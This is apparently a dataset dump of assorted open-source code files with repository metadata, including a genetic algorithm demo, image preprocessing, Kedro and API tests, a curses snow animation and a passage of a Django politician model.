hexsha stringlengths 40 40 | size int64 4 1.02M | ext stringclasses 8 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 209 | max_stars_repo_name stringlengths 5 121 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 209 | max_issues_repo_name stringlengths 5 121 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 209 | max_forks_repo_name stringlengths 5 121 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 1.02M | avg_line_length float64 1.07 66.1k | max_line_length int64 4 266k | alphanum_fraction float64 0.01 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c99d3c7e28e9dea78a86ef5a775934a3c6b5969f | 3,164 | py | Python | AG1.py | ingratosocial/gaia | 0f08648c9ddec0e6b9fc19ad760b56683c34a0d9 | [
"MIT"
] | null | null | null | AG1.py | ingratosocial/gaia | 0f08648c9ddec0e6b9fc19ad760b56683c34a0d9 | [
"MIT"
] | null | null | null | AG1.py | ingratosocial/gaia | 0f08648c9ddec0e6b9fc19ad760b56683c34a0d9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import random
modelo = [1,2,3,4,5] # Objetivo
largo = len(modelo) # longitud del material genetico de cada individuo
num = 10 # Cantidad de individuos de cada generación
progenitores = 3 # Individuos para reproduccion > 2
mutacion = 0.2 # Probabilidad de mutación
generaciones = 50
print '\nModelo: \n' , modelo
def individuo(min, max):
return[random.randint(min, max) for i in range(largo)]
def crearPoblacion():
return[individuo(1,9) for i in range(num)]
def calcularFitness(individuo):
fitness = 0
for i in range(len(individuo)):
if individuo[i] == modelo[i]:
fitness += 1
return fitness
def seleccion_reproduccion(poblacion):
puntuados = [(calcularFitness(i), i) for i in poblacion] # Calcula el fitness de cada individuo, y lo guarda en pares
puntuados = [i[1] for i in sorted(puntuados)] # Ordena los pares de menor a mayor
poblacion = puntuados
seleccionados = puntuados[(len(puntuados)-progenitores):] # Selección de los individuos con mayor fitness
for i in range(len(poblacion)-progenitores): # No se tocan a los mejores fitness
punto = random.randint(1,largo-1) # One-Point
padre = random.sample(seleccionados, 2) # Se eligen dos padres al azar
poblacion[i][:punto] = padre[0][:punto] # Se mezcla el material genetico de los padres, reemplazando la poblacion anterior
poblacion[i][punto:] = padre[1][punto:]
return poblacion
def mutation(poblacion):
for i in range(len(poblacion)-progenitores):
if random.random() <= mutacion: # Cada individuo de la poblacion menos los padres tienen una probabilidad de mutar
punto = random.randint(1,largo-1) # Se elgie un punto al azar
nuevo_valor = random.randint(1,9) # Se determina un nuevo valor
while nuevo_valor == poblacion[i][punto]: # Que no sea el anterior valor
nuevo_valor = random.randint(1,9) # Se insiste
poblacion[i][punto] = nuevo_valor
return poblacion
poblacion = crearPoblacion() # Se crea poblacion Inicial
print '\nPoblacion inicial:\n', poblacion
for i in range(generaciones): # Se evoluciona la poblacion la cantidad de generaciones deseadas
poblacion = seleccion_reproduccion(poblacion) # Proceso de selección natural
poblacion = mutation(poblacion)
print '\nPoblacion final:\n', poblacion # Se muestra la poblacion final
input('\nPresione Enter para salir.') | 60.846154 | 150 | 0.541719 |
5fd261b876fba34b2aec8e5cd4490a043642fc54 | 3,387 | py | Python | nimble/preprocessing.py | risteon/nimble | 7ba28d3f2cc08501dc68ae4d63cf82980005df75 | [
"MIT"
] | 1 | 2017-01-20T14:04:39.000Z | 2017-01-20T14:04:39.000Z | nimble/preprocessing.py | risteon/nimble | 7ba28d3f2cc08501dc68ae4d63cf82980005df75 | [
"MIT"
] | null | null | null | nimble/preprocessing.py | risteon/nimble | 7ba28d3f2cc08501dc68ae4d63cf82980005df75 | [
"MIT"
] | null | null | null | from __future__ import division
import numpy as np
from scipy.misc import imresize
# scale Label
SCALING_FACTOR = 0.1
def convert_to_scaled_floats(x):
r = x.astype(np.float32)
r /= 255
return r
def flip_axis(x, axis):
x = np.asarray(x).swapaxes(axis, 0)
x = x[::-1, ...]
x = x.swapaxes(0, axis)
return x
def resize_image(image, shape):
return imresize(image, shape, interp='lanczos')
def resize_and_crop_image(image, shape):
if image.shape == shape:
return image
rows, cols, _ = image.shape
rows_n, cols_n, _ = shape
resize_fraction = float(max(rows_n/rows, cols_n/cols))
res = imresize(image, resize_fraction, interp='bicubic')
d_rows, d_cols = res.shape[0] - rows_n, res.shape[1] - cols_n
if d_rows == 0:
s = int(d_cols/2)
r = d_cols - s
return res[:, s: -r, :]
elif d_cols == 0:
# choose to return the lower part of the picture
# TODO: generalize this behavior?
#s = int(d_rows / 2)
#r = d_rows - s
return res[d_rows:, :, :]
else:
assert False
class PreprocessedSequenceGenerator:
def __init__(self, batch_generator,
to_scaled_floats=False,
scaling_factor=SCALING_FACTOR,
resize=False,
flip_horizontal=False,
flip_vertical=False,
flip_sequence=False):
self.__dict__.update(locals())
self._generator = batch_generator
# Assume dimension ordering: [(batch,) frame, row, column, channel]
# these indices are counted excluding (!) the batch dimension
self.img_frame_index = 0
self.img_row_index = 1
self.img_col_index = 2
def flow(self, prob=0.5):
for batch, labels in self._generator:
# these transforms can be performed on the whole batch
transf_batch, transf_labels = self._transform(batch, labels)
# iterate over data in batch for random transforms
for i in range(transf_batch.shape[0]):
transf_batch[i, ...], transf_labels[i, ...] =\
self._random_transform(transf_batch[i, ...], transf_labels[i, ...], prob)
yield transf_batch, transf_labels
def _transform(self, batch, labels):
if self.resize is not False:
transformed = np.empty((batch.shape[0], batch.shape[1]) + self.resize, batch.dtype)
for i in np.ndindex(batch.shape[0], batch.shape[1]):
transformed[i + (Ellipsis,)] = resize_and_crop_image(batch[i + (Ellipsis,)], self.resize)
else:
transformed = batch
if self.to_scaled_floats:
transformed = convert_to_scaled_floats(transformed)
# Todo: Scale down labels
labels *= self.scaling_factor
return transformed, labels
def _random_transform(self, data, label, prob):
if self.flip_horizontal:
if np.random.random() < prob:
data = flip_axis(data, self.img_col_index)
if self.flip_vertical:
if np.random.random() < prob:
data = flip_axis(data, self.img_row_index)
if self.flip_sequence:
if np.random.random() < prob:
data = flip_axis(data, self.img_frame_index)
label = -label
return data, label
| 33.205882 | 105 | 0.59876 |
33d23106b7c15c359021d10ef7b98a5f054373f1 | 6,516 | py | Python | tests/template/test_load_context_framework.py | laisbsc/kedro | abdb51f1fc5a247dc92cca63010cf06a581c5462 | [
"Apache-2.0"
] | null | null | null | tests/template/test_load_context_framework.py | laisbsc/kedro | abdb51f1fc5a247dc92cca63010cf06a581c5462 | [
"Apache-2.0"
] | null | null | null | tests/template/test_load_context_framework.py | laisbsc/kedro | abdb51f1fc5a247dc92cca63010cf06a581c5462 | [
"Apache-2.0"
] | 1 | 2021-08-22T08:16:22.000Z | 2021-08-22T08:16:22.000Z | # Copyright 2020 QuantumBlack Visual Analytics Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND
# NONINFRINGEMENT. IN NO EVENT WILL THE LICENSOR OR OTHER CONTRIBUTORS
# BE LIABLE FOR ANY CLAIM, DAMAGES, OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF, OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# The QuantumBlack Visual Analytics Limited ("QuantumBlack") name and logo
# (either separately or in combination, "QuantumBlack Trademarks") are
# trademarks of QuantumBlack. The License does not grant you any right or
# license to the QuantumBlack Trademarks. You may not use the QuantumBlack
# Trademarks or any confusingly similar mark as a trademark for your product,
# or use the QuantumBlack Trademarks in any other manner that might cause
# confusion in the marketplace, including but not limited to in advertising,
# on websites, or on software.
#
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
import pytest
import toml
from kedro import __version__ as kedro_version
from kedro.framework.context import KedroContext, load_context
from kedro.framework.startup import _get_project_metadata
@pytest.fixture(autouse=True)
def mock_logging_config(mocker):
# Disable logging.config.dictConfig in KedroContext._setup_logging as
# it changes logging.config and affects other unit tests
mocker.patch("logging.config.dictConfig")
def _create_kedro_config(project_path, payload):
kedro_conf = project_path / "pyproject.toml"
kedro_conf.parent.mkdir(parents=True, exist_ok=True)
toml_str = toml.dumps(payload)
kedro_conf.write_text(toml_str)
class MyContext(KedroContext):
pass
@pytest.mark.usefixtures("fake_project_cli")
class TestLoadContext:
def test_valid_context(self, fake_repo_path, mocker):
"""Test getting project context."""
get_project_metadata_mock = mocker.patch(
"kedro.framework.context.context._get_project_metadata",
wraps=_get_project_metadata,
)
result = load_context(str(fake_repo_path))
assert result.package_name == "fake_package"
assert str(fake_repo_path.resolve() / "src") in sys.path
get_project_metadata_mock.assert_called_with(fake_repo_path)
def test_valid_context_with_env(self, mocker, monkeypatch, fake_repo_path):
"""Test getting project context when Kedro config environment is
specified in the environment variable.
"""
mocker.patch("kedro.config.config.ConfigLoader.get")
monkeypatch.setenv("KEDRO_ENV", "my_fake_env")
result = load_context(str(fake_repo_path))
assert result.env == "my_fake_env"
def test_invalid_path(self, tmp_path):
"""Test for loading context from an invalid path. """
other_path = tmp_path / "other"
other_path.mkdir()
pattern = "Could not find the project configuration file 'pyproject.toml'"
with pytest.raises(RuntimeError, match=re.escape(pattern)):
load_context(str(other_path))
def test_pyproject_toml_has_missing_mandatory_keys(self, fake_repo_path):
payload = {
"tool": {
"kedro": {"fake_key": "fake_value", "project_version": kedro_version}
}
}
_create_kedro_config(fake_repo_path, payload)
pattern = (
"Missing required keys ['package_name', 'project_name'] "
"from 'pyproject.toml'."
)
with pytest.raises(RuntimeError, match=re.escape(pattern)):
load_context(str(fake_repo_path))
def test_pyproject_toml_has_extra_keys(self, fake_repo_path, fake_package_name):
project_name = "Test Project"
payload = {
"tool": {
"kedro": {
"project_version": kedro_version,
"project_name": project_name,
"package_name": fake_package_name,
"unexpected_key": "hello",
}
}
}
_create_kedro_config(fake_repo_path, payload)
pattern = (
"Found unexpected keys in 'pyproject.toml'. Make sure it "
"only contains the following keys: ['package_name', "
"'project_name', 'project_version', 'source_dir']."
)
with pytest.raises(RuntimeError, match=re.escape(pattern)):
load_context(str(fake_repo_path))
def test_settings_py_has_no_context_path(self, fake_repo_path):
"""Test for loading default `KedroContext` context. """
payload = {
"tool": {
"kedro": {
"package_name": "fake_package",
"project_version": kedro_version,
"project_name": "fake_project",
}
}
}
_create_kedro_config(fake_repo_path, payload)
context = load_context(str(fake_repo_path))
assert isinstance(context, KedroContext)
assert context.__class__ is KedroContext
def test_settings_py_has_context_path(
self, fake_repo_path, fake_package_name, mocker
):
"""Test for loading custom `ProjectContext` context. """
payload = {
"tool": {
"kedro": {
"package_name": fake_package_name,
"project_version": kedro_version,
"project_name": "fake_project",
}
}
}
_create_kedro_config(fake_repo_path, payload)
settings_mock = mocker.patch(
"kedro.framework.context.context._get_project_settings",
side_effect=(MyContext, (), (), "conf"),
)
context = load_context(str(fake_repo_path))
assert isinstance(context, KedroContext)
assert context.__class__ is not KedroContext
assert context.__class__.__name__ == "MyContext"
settings_mock.assert_called_once_with(
fake_package_name, "CONTEXT_CLASS", KedroContext
)
| 37.883721 | 85 | 0.663137 |
2e6935b106db7bde9e36ccafbddf9e11212051f9 | 1,012 | py | Python | src/flatten_nest_dict.py | kemingy/daily-coding-problem | 0839311ec0848f8f0b4a9edba817ecceb8f944a0 | [
"Unlicense"
] | 3 | 2019-03-06T03:14:56.000Z | 2020-01-07T16:00:48.000Z | src/flatten_nest_dict.py | kemingy/daily-coding-problem | 0839311ec0848f8f0b4a9edba817ecceb8f944a0 | [
"Unlicense"
] | null | null | null | src/flatten_nest_dict.py | kemingy/daily-coding-problem | 0839311ec0848f8f0b4a9edba817ecceb8f944a0 | [
"Unlicense"
] | null | null | null | # Write a function to flatten a nested dictionary. Namespace the keys with a
# period.
# For example, given the following dictionary:
# {
# "key": 3,
# "foo": {
# "a": 5,
# "bar": {
# "baz": 8
# }
# }
# }
# it should become:
# {
# "key": 3,
# "foo.a": 5,
# "foo.bar.baz": 8
# }
# You can assume keys do not contain dots in them, i.e. no clobbering will occur.
def flatten(nested):
result = {}
def helper(dic, prefix):
for key in dic:
pre = key if not prefix else '{}.{}'.format(prefix, key)
if isinstance(dic[key], dict):
helper(dic[key], pre)
else:
result[pre] = dic[key]
helper(nested, '')
return result
if __name__ == '__main__':
nested = {
"key": 3,
"foo": {
"a": 5,
"bar": {
"baz": 8
}
}
}
print(flatten(nested)) | 21.083333 | 82 | 0.433794 |
dfd7747763dddc0808fb3dc0430ccf5efcb4ae6b | 2,122 | py | Python | test/test_edit_group.py | Nasts/pythin_training | 3a46b98e4130d26f9a8f32ea607b1a14b3ea13b8 | [
"Apache-2.0"
] | null | null | null | test/test_edit_group.py | Nasts/pythin_training | 3a46b98e4130d26f9a8f32ea607b1a14b3ea13b8 | [
"Apache-2.0"
] | 3 | 2020-02-08T14:31:55.000Z | 2020-02-09T17:12:27.000Z | test/test_edit_group.py | Nasts/pythin_training | 3a46b98e4130d26f9a8f32ea607b1a14b3ea13b8 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import random
import allure
from model.group import Group
def test_edit_group_name(app, db, check_ui):
if len(db.get_group_list()) == 0:
app.group.create(Group(name="new group"))
with allure.step("Given a group list"):
old_groups = db.get_group_list()
with allure.step("When I choice a group from the list"):
edit_group = random.choice(old_groups)
group = Group(name="New group edit", id=edit_group.id)
with allure.step("Then I edit a group by id"):
app.group.edit_group_by_id(edit_group.id, group)
with allure.step("Then the new group list is equal to the old list"):
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups[old_groups.index(edit_group)] = group
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
if check_ui:
assert sorted(new_groups, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)
# def test_edit_first_group(app):
# if app.group.count() == 0:
# app.group.create(Group(name="new group", header="new group", footer="new group"))
# old_groups = app.group.get_group_list()
# app.group.edit_first_group(Group(name="new edit group", header="new edit group", footer="new edit group"))
# new_groups = app.group.get_group_list()
# assert len(old_groups) == len(new_groups)
# def test_edit_group_name(app):
# if app.group.count() == 0:
# app.group.create(Group(name="new group"))
# old_groups = app.group.get_group_list()
# app.group.edit_first_group(Group(name="change new edit group"))
# new_groups = app.group.get_group_list()
# assert len(old_groups) == len(new_groups)
#
#
# def test_edit_group_header(app):
# if app.group.count() == 0:
# app.group.create(Group(header="new group"))
# old_groups = app.group.get_group_list()
# app.group.edit_first_group(Group(header="change new header group"))
# new_groups = app.group.get_group_list()
# assert len(old_groups) == len(new_groups)
| 40.037736 | 117 | 0.675778 |
5b7d37c603133f3af15ac966b150a65cde909f15 | 707 | py | Python | pyleecan/Methods/Machine/LamSlotWind/comp_output_geo.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 95 | 2019-01-23T04:19:45.000Z | 2022-03-17T18:22:10.000Z | pyleecan/Methods/Machine/LamSlotWind/comp_output_geo.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 366 | 2019-02-20T07:15:08.000Z | 2022-03-31T13:37:23.000Z | pyleecan/Methods/Machine/LamSlotWind/comp_output_geo.py | IrakozeFD/pyleecan | 5a93bd98755d880176c1ce8ac90f36ca1b907055 | [
"Apache-2.0"
] | 74 | 2019-01-24T01:47:31.000Z | 2022-02-25T05:44:42.000Z | # -*- coding: utf-8 -*-
from ....Classes.Lamination import Lamination
def comp_output_geo(self):
"""Compute the main geometry output
Parameters
----------
self : Lamination
A Lamination object
Returns
-------
output: OutGeoLam
Main geometry output of the lamintion
"""
output = Lamination.comp_output_geo(self)
output.Ksfill = self.comp_fill_factor()
if self.slot is None:
output.S_slot = 0
output.S_slot_wind = 0
else:
output.S_slot = self.slot.comp_surface()
output.S_slot_wind = self.slot.comp_surface_active()
# output.S_wind_act = self.winding.conductor.comp_surface_active()
return output
| 22.09375 | 70 | 0.640736 |
67d90c6021a67bbc7c4c084fc4085d44a75d80f5 | 1,778 | py | Python | generate_config.py | kaityo256/lammps_restart | 3b3d125af979b2a05f049892786bca1c8b25db59 | [
"MIT"
] | null | null | null | generate_config.py | kaityo256/lammps_restart | 3b3d125af979b2a05f049892786bca1c8b25db59 | [
"MIT"
] | null | null | null | generate_config.py | kaityo256/lammps_restart | 3b3d125af979b2a05f049892786bca1c8b25db59 | [
"MIT"
] | null | null | null | class Atom:
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
self.type = 1
self.vx = 0.0
self.vy = 0.0
self.vz = 0.0
def get_atoms():
atoms = []
r = 4
s = 1.55
h = 0.5 * s
for ix in range(r):
for iy in range(r):
for iz in range(r):
x = ix * s
y = iy * s
z = iz * s
atoms.append(Atom(x, y, z))
atoms.append(Atom(x, y+h, z+h))
atoms.append(Atom(x+h, y, z+h))
atoms.append(Atom(x+h, y+h, z))
return atoms
def save_file(filename, atoms):
with open(filename, "w") as f:
f.write("Position Data\n\n")
f.write("{} atoms\n".format(len(atoms)))
f.write("1 atom types\n\n")
f.write("0.0 6.00 xlo xhi\n")
f.write("0.0 6.00 ylo yhi\n")
f.write("0.0 6.00 zlo zhi\n")
f.write("\n")
f.write("Atoms\n\n")
for i, a in enumerate(atoms):
f.write("{} {} {} {} {}\n".format(i+1, a.type, a.x, a.y, a.z))
f.write("\n")
f.write("Velocities\n\n")
for i, a in enumerate(atoms):
f.write("{} {} {} {}\n".format(i+1, a.vx, a.vy, a.vz))
print(f"{len(atoms)} atoms")
print(f"Generated {filename}")
def find_range(atoms):
x = []
y = []
z = []
for a in atoms:
x.append(a.x)
y.append(a.y)
z.append(a.z)
print(f"{min(x)} < x < {max(x)}")
print(f"{min(y)} < y < {max(y)}")
print(f"{min(z)} < z < {max(z)}")
def run():
a = get_atoms()
find_range(a)
save_file("test.atoms", a)
if __name__ == "__main__":
run()
| 25.4 | 75 | 0.426322 |
5caff27a5fd164213ba71b7d4f7958789daa9f67 | 3,710 | py | Python | Game Palace/snow.py | BirdLQ/Game-Arcade | f61081250a617d33dccd4dc81fd469bfcbe0afe3 | [
"MIT"
] | 1 | 2021-01-08T01:44:23.000Z | 2021-01-08T01:44:23.000Z | Game Palace/snow.py | BirdLQ/Game-Arcade | f61081250a617d33dccd4dc81fd469bfcbe0afe3 | [
"MIT"
] | null | null | null | Game Palace/snow.py | BirdLQ/Game-Arcade | f61081250a617d33dccd4dc81fd469bfcbe0afe3 | [
"MIT"
] | null | null | null | import curses
import time
import random
from methods.ascii_dict import *
import main_menu
import gameoflife
snowflake = ['*', '+', '.']
def get_screen(stdscr):
h, w = stdscr.getmaxyx()
return (h, w)
def max_dimensions(window):
height, width = window.getmaxyx()
return height - 2, width - 1
def draw_moon(stdscr):
curses.mousemask(1)
moon_pos = []
moon = [
' ** ',
' *** ',
' ***',
' ***',
' *** ',
' ** ',
]
start_position = max_dimensions(stdscr)[1] - 10
stdscr.attrset(curses.color_pair(1))
for height, line in enumerate(moon, start=1):
for position, sym in enumerate(line, start=start_position):
stdscr.addch(height, position, sym)
moon_pos.append([height, position])
stdscr.attrset(curses.color_pair(0))
key = stdscr.getch()
if key == curses.KEY_MOUSE:
_, x, y, _, _ = curses.getmouse()
if [y, x] in moon_pos:
gameoflife.gol_start()
def build_cabin(stdscr):
h, w = get_screen(stdscr)
snowDict = {}
if h > 7 and w > 16:
for pos in smallHouse.keys():
if pos[0] == 0:
new_pos = (h-7,int(2*w/3+pos[1]))
if pos[0] == 1:
new_pos = (h-6,int(2*w/3+pos[1]))
if pos[0] == 2:
new_pos = (h-5,int(2*w/3+pos[1]))
if pos[0] == 3:
new_pos = (h-4,int(2*w/3+pos[1]))
if pos[0] == 4:
new_pos = (h-3,int(2*w/3+pos[1]))
if pos[0] == 5:
new_pos = (h-2,int(2*w/3+pos[1]))
snowDict[new_pos] = smallHouse[pos]
return snowDict
# create a snowflake! we need to know its starting position (in the x)
# which can be any value between 1 and max width, need to choose the char
def create_flake(stdscr):
w = get_screen(stdscr)[1]
x = random.randrange(1, w)
flake = random.choice(snowflake)
return (x, flake)
def new_snow(stdscr, snowDict):
w = get_screen(stdscr)[1]
x, flake = create_flake(stdscr)
# dont forget curses goes like "y,x" for some dumbass reason
snow = {(0,x): flake}
return snow
def draw_snow(stdscr, snowDict):
h = get_screen(stdscr)[0]
for key in snowDict.keys():
if key[0] < h-1:
stdscr.addch(key[0], key[1], snowDict[key])
else:
pass
"""
def pack_snow(stdscr, snowDict):
i, j = 0, 0
w, h = get_screen(stdscrn)
for j in range (1,w):
if snowDict[((h-3),j)] in snowflake:
for i in range(0,3):
snowDict[h-]
"""
def move_snow(stdscr, snowDict):
movedSnowDict = {}
h = get_screen(stdscr)[0]
for pos in snowDict.keys():
if pos[0] < h-2 and (pos[0]+1,pos[1]) not in snowDict.keys():
new_pos = (pos[0]+1, pos[1])
else:
new_pos = pos
movedSnowDict[new_pos] = snowDict[pos]
return movedSnowDict
def main(stdscr):
snowDict = build_cabin(stdscr)
curses.curs_set(0)
stdscr.nodelay(1)
curses.init_pair(1, curses.COLOR_YELLOW, curses.COLOR_BLACK)
msg = 'COMING SOON !'
y, x = get_screen(stdscr)[0]//2, get_screen(stdscr)[1]//2-len(msg)//2
while True:
key = stdscr.getch()
if key == curses.KEY_EXIT or key == 27:
break
stdscr.clear()
draw_moon(stdscr)
snowDict.update(new_snow(stdscr, snowDict))
draw_snow(stdscr, snowDict)
snowDict = move_snow(stdscr, snowDict)
stdscr.addstr(y, x, msg, curses.A_STANDOUT)
stdscr.refresh()
time.sleep(.1)
stdscr.nodelay(0)
main_menu.run_app()
def Snow():
curses.wrapper(main) | 28.75969 | 73 | 0.555256 |
ccec02eae104728a219e9b693bc609a17e3db765 | 775 | py | Python | svc_confusion_matrix.py | ksrinivs64/gntk | 861770b4fc48e48c71fa9283b2f84a06b80e7c05 | [
"MIT"
] | null | null | null | svc_confusion_matrix.py | ksrinivs64/gntk | 861770b4fc48e48c71fa9283b2f84a06b80e7c05 | [
"MIT"
] | null | null | null | svc_confusion_matrix.py | ksrinivs64/gntk | 861770b4fc48e48c71fa9283b2f84a06b80e7c05 | [
"MIT"
] | null | null | null | import numpy as np
from os.path import join
from sklearn.svm import SVC
from sklearn.model_selection import StratifiedKFold, cross_val_predict
from sklearn.metrics import confusion_matrix
import argparse
def search(data_dir):
gram = np.load(join(data_dir, 'gram.npy'))
gram /= gram.min()
y = np.load(join(data_dir, 'labels.npy'))
svc = SVC(C=0.09077853991937558, kernel='precomputed', cache_size=16000, max_iter=5e5)
y_pred = cross_val_predict(svc, gram, y, cv=StratifiedKFold(n_splits=3))
conf_mat = confusion_matrix(y, y_pred)
print(conf_mat)
parser = argparse.ArgumentParser(description='hyper-parameter search')
parser.add_argument('--data_dir', type=str, required=True, help='data_dir')
args = parser.parse_args()
search(args.data_dir)
| 31 | 90 | 0.753548 |
383a9e78a3104dfd5233c7313af56f5df36d592b | 2,005 | py | Python | api/tests/test_sessions.py | jcuna/room-mgt | 84c071b5f3a2e6276f0064fd3f5a8ea3d87b58f7 | [
"MIT"
] | null | null | null | api/tests/test_sessions.py | jcuna/room-mgt | 84c071b5f3a2e6276f0064fd3f5a8ea3d87b58f7 | [
"MIT"
] | 21 | 2019-07-04T21:31:37.000Z | 2022-02-26T09:50:57.000Z | api/tests/test_sessions.py | jcuna/room-mgt | 84c071b5f3a2e6276f0064fd3f5a8ea3d87b58f7 | [
"MIT"
] | null | null | null | import io
from base64 import b64encode, b64decode
from sqlalchemy.exc import OperationalError
import pytest
from tests import endpoint
def test_install(no_db_client):
from dal.models import User
from dal.models import CompanyProfile
rv = no_db_client.get(endpoint('/user'))
assert rv.json['error'] == 'install'
assert rv.status_code == 501
with pytest.raises(OperationalError) as ex:
User.query.count()
assert 'no such table' in ex.value
no_db_client.get('/install')
post = {
'email': 'testuser@domain.com',
'password': 'master',
'first_name': 'John',
'last_name': 'Smith',
'company_name': 'Green CRN',
'address': '1500 Sample St. Sunnyside CA 98996',
'contact': '5555555555',
'logo': (io.BytesIO(b'12345asdfg'), 'test.png'),
}
rv = no_db_client.post('/install', data=post, content_type='multipart/form-data')
assert b'Redirecting' in rv.data
u = User.query.all()
assert len(u) == 1
assert u[0].email == 'testuser@domain.com'
c = CompanyProfile.query.all()
assert len(c) == 1
assert c[0].name == 'Green CRN'
assert isinstance(c[0].logo, bytes)
def test_fetch_company(no_db_client):
resp = no_db_client.get(endpoint('/company'))
assert 'name' in resp.json
assert 'logo' in resp.json
assert resp.json['logo'] is not None
assert isinstance(resp.json['logo'], str)
assert isinstance(b64decode(resp.json['logo']), bytes)
def test_no_session(no_db_client):
rv = no_db_client.get(endpoint('/user'))
assert rv.json['error'] == 'no session'
assert rv.status_code == 403
def test_login(no_db_client):
auth = {
'Authorization': 'Basic ' + b64encode(b'testuser@domain.com' + b':' + b'master').decode()
}
rv = no_db_client.post(endpoint('/login'), headers=auth)
assert rv.json['user']['email'] == 'testuser@domain.com'
assert 'value' in rv.json['token']
assert rv.status_code == 200
| 29.057971 | 97 | 0.645387 |
13bb86e6cbb0bb4a373def0a44261ffce202b90c | 66,341 | py | Python | politician/models.py | aucoeur/WeVoteServer | 7b30bdbb59d6e0c19abc81237aa42fba7de1a432 | [
"MIT"
] | 44 | 2015-11-19T04:52:39.000Z | 2021-03-17T02:08:26.000Z | politician/models.py | aucoeur/WeVoteServer | 7b30bdbb59d6e0c19abc81237aa42fba7de1a432 | [
"MIT"
] | 748 | 2015-09-03T04:18:33.000Z | 2022-03-10T14:08:10.000Z | politician/models.py | aucoeur/WeVoteServer | 7b30bdbb59d6e0c19abc81237aa42fba7de1a432 | [
"MIT"
] | 145 | 2015-09-19T10:10:44.000Z | 2022-03-04T21:01:12.000Z | # politician/models.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
import re
from django.db import models
from django.db.models import Q
import wevote_functions.admin
from exception.models import handle_exception, handle_record_found_more_than_one_exception
from tag.models import Tag
from wevote_functions.functions import convert_to_political_party_constant, \
display_full_name_with_correct_capitalization, \
extract_first_name_from_full_name, extract_middle_name_from_full_name, \
extract_last_name_from_full_name, extract_twitter_handle_from_text_string, positive_value_exists
from wevote_settings.models import fetch_next_we_vote_id_politician_integer, fetch_site_unique_id_prefix
FEMALE = 'F'
GENDER_NEUTRAL = 'N'
MALE = 'M'
UNKNOWN = 'U'
GENDER_CHOICES = (
(FEMALE, 'Female'),
(GENDER_NEUTRAL, 'Gender Neutral'),
(MALE, 'Male'),
(UNKNOWN, 'Unknown'),
)
logger = wevote_functions.admin.get_logger(__name__)
# When merging candidates, these are the fields we check for figure_out_candidate_conflict_values
POLITICIAN_UNIQUE_IDENTIFIERS = [
'ballotpedia_id',
'bioguide_id',
'birth_date',
'cspan_id',
'ctcl_uuid',
'first_name',
'gender',
'govtrack_id',
'house_history_id',
'icpsr_id',
'last_name',
'lis_id',
'maplight_id',
'middle_name',
'opensecrets_id',
'political_party',
'politician_email_address',
'politician_facebook_id',
'politician_googleplus_id',
'politician_name',
'politician_phone_number',
'politician_twitter_handle',
'politician_url',
'politician_youtube_id',
'state_code',
'thomas_id',
'vote_smart_id',
'vote_usa_politician_id',
'washington_post_id',
'we_vote_hosted_profile_image_url_large',
'we_vote_hosted_profile_image_url_medium',
'we_vote_hosted_profile_image_url_tiny',
'wikipedia_id',
]
class Politician(models.Model):
# We are relying on built-in Python id field
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our data with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "pol", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_politician_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id of this politician", max_length=255, default=None, null=True,
blank=True, unique=True)
# See this url for properties: https://docs.python.org/2/library/functions.html#property
first_name = models.CharField(verbose_name="first name",
max_length=255, default=None, null=True, blank=True)
middle_name = models.CharField(verbose_name="middle name",
max_length=255, default=None, null=True, blank=True)
last_name = models.CharField(verbose_name="last name",
max_length=255, default=None, null=True, blank=True)
politician_name = models.CharField(verbose_name="official full name",
max_length=255, default=None, null=True, blank=True)
# This is the politician's name from GoogleCivicCandidateCampaign
google_civic_candidate_name = models.CharField(verbose_name="full name from google civic",
max_length=255, default=None, null=True, blank=True)
google_civic_candidate_name2 = models.CharField(max_length=255, null=True)
google_civic_candidate_name3 = models.CharField(max_length=255, null=True)
# This is the politician's name assembled from TheUnitedStatesIo first_name + last_name for quick search
full_name_assembled = models.CharField(verbose_name="full name assembled from first_name + last_name",
max_length=255, default=None, null=True, blank=True)
